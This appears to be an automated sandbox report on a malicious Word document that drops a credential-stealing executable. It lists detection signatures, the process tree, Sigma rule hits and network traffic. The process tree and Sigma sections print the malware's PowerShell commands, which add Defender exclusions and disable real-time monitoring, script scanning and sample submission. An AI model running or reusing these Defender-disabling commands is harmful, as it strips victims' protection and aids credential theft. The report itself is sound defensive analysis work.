Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5QnwxSJVyX.doc

Overview

General Information

Sample name:5QnwxSJVyX.doc
(renamed file extension from none to doc, renamed because original name is a hash value)
Original sample name:0faaf305176113777cc706b6df9603c131382a35a0de9efd1cc2e883dd95459d
Analysis ID:1562811
MD5:5085b78ddbc67c16dd26dc908ee14140
SHA1:87a9084b27f45ac42e23c92db0fd86ad7c5acbb2
SHA256:0faaf305176113777cc706b6df9603c131382a35a0de9efd1cc2e883dd95459d
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document exploit detected (process start blacklist hit)
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7364 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • vhcst.exe (PID: 7848 cmdline: "C:\2716439\vhcst.exe" MD5: 6D8282E9F5AA75B07B018DC5CC2F6BC7)
    • vhcst.exe (PID: 7916 cmdline: "C:\7037005\vhcst.exe" MD5: 6D8282E9F5AA75B07B018DC5CC2F6BC7)
      • powershell.exe (PID: 8120 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5296 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 7788 cmdline: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 7876 cmdline: "wmic.exe" os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 8088 cmdline: "wmic.exe" computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 2932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 5828 cmdline: "wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7868 cmdline: "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 1436 cmdline: "wmic" path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5772 cmdline: "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct | Select-Object -ExpandProperty displayName MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\2716439\vhcst.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      C:\2716439\vhcst.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000004.00000000.1769853932.0000023FBA422000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000006.00000002.2223963813.0000021F8382B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: vhcst.exe PID: 7848JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: vhcst.exe PID: 7916JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                4.0.vhcst.exe.23fba420000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: File With Uncommon Extension Created By An Office Application
                  Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7364, TargetFilename: C:\2716439\vhcst.exe
                  Sigma detected: Legitimate Application Dropped Archive
                  Source: File createdAuthor: frack113, Florian Roth: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\b5uubc[1].zip
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\7037005\vhcst.exe" , ParentImage: C:\7037005\vhcst.exe, ParentProcessId: 7916, ParentProcessName: vhcst.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', ProcessId: 8120, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Disable Scan Feature
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, CommandLine|base64offset|contains: I~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\7037005\vhcst.exe" , ParentImage: C:\7037005\vhcst.exe, ParentProcessId: 7916, ParentProcessName: vhcst.exe, ProcessCommandLine: "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2, ProcessId: 7788, ProcessName: powershell.exe
                  Sigma detected: Suspicious Startup Folder Persistence
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\7037005\vhcst.exe, ProcessId: 7916, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SYTv5.scr
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\7037005\vhcst.exe" , ParentImage: C:\7037005\vhcst.exe, ParentProcessId: 7916, ParentProcessName: vhcst.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', ProcessId: 8120, ProcessName: powershell.exe
                  Sigma detected: SCR File Write Event
                  Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\7037005\vhcst.exe, ProcessId: 7916, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SYTv5.scr
                  Sigma detected: Startup Folder File Write
                  Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\7037005\vhcst.exe, ProcessId: 7916, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SYTv5.scr
                  Sigma detected: Suspicious Office Outbound Connections
                  Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49735, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7364, Protocol: tcp, SourceIp: 108.181.20.35, SourceIsIpv6: false, SourcePort: 443
                  Sigma detected: Suspicious Screensaver Binary File Creation
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\7037005\vhcst.exe, ProcessId: 7916, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SYTv5.scr
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\7037005\vhcst.exe" , ParentImage: C:\7037005\vhcst.exe, ParentProcessId: 7916, ParentProcessName: vhcst.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\7037005\vhcst.exe', ProcessId: 8120, ProcessName: powershell.exe
                  Sigma detected: Office Macro File Creation
                  Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T04:19:31.441150+010028275781A Network Trojan was detected192.168.2.449735108.181.20.35443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: 5QnwxSJVyX.docAvira: detected
                  Multi AV Scanner detection for dropped file
                  Source: C:\2716439\vhcst.exeReversingLabs: Detection: 50%
                  Source: C:\2716439\vhcst.exeVirustotal: Detection: 54%Perma Link
                  Source: C:\7037005\vhcst.exeReversingLabs: Detection: 50%
                  Source: C:\7037005\vhcst.exeVirustotal: Detection: 54%Perma Link
                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrReversingLabs: Detection: 50%
                  Multi AV Scanner detection for submitted file
                  Source: 5QnwxSJVyX.docVirustotal: Detection: 50%Perma Link
                  Machine Learning detection for dropped file
                  Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scrJoe Sandbox ML: detected
                  Source: C:\2716439\vhcst.exeJoe Sandbox ML: detected
                  Source: C:\2716439\vhcst.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: 5QnwxSJVyX.docJoe Sandbox ML: detected
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD26BE CryptUnprotectData,6_2_00007FFD99FD26BE
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD26F1 CryptUnprotectData,6_2_00007FFD99FD26F1
                  Source: C:\7037005\vhcst.exeCode function: 6_2_00007FFD99FD270E CryptUnprotectData,6_2_00007FFD99FD270E
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49809 version: TLS 1.2

                  Software Vulnerabilities

                  barindex
                  Document exploit detected (creates forbidden files)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\2716439\vhcst.exeJump to behavior
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\7037005\vhcst.exeJump to behavior
                  Document exploit detected (drops PE files)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: vhcst.exe.0.drJump to dropped file
                  Document exploit detected (process start blacklist hit)
                  Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\2716439\vhcst.exe
                  Source: global trafficDNS query: name: files.catbox.moe
                  Source: global trafficDNS query: name: ip-api.com
                  Source: global trafficDNS query: name: discord.com
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 108.181.20.35:443 -> 192.168.2.4:49735
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 108.181.20.35:443
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.4:49803
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.4:49803
                  Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.4:49803
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 208.95.112.1:80 -> 192.168.2.4:49803
                  Source: global trafficTCP traffic: 192.168.2.4:49803 -> 208.95.112.1:80
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49809
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49809 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 162.159.136.232:443 -> 192.168.2.4:49810
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
                  Source: global trafficTCP traffic: 192.168.2.4:49810 -> 162.159.136.232:443
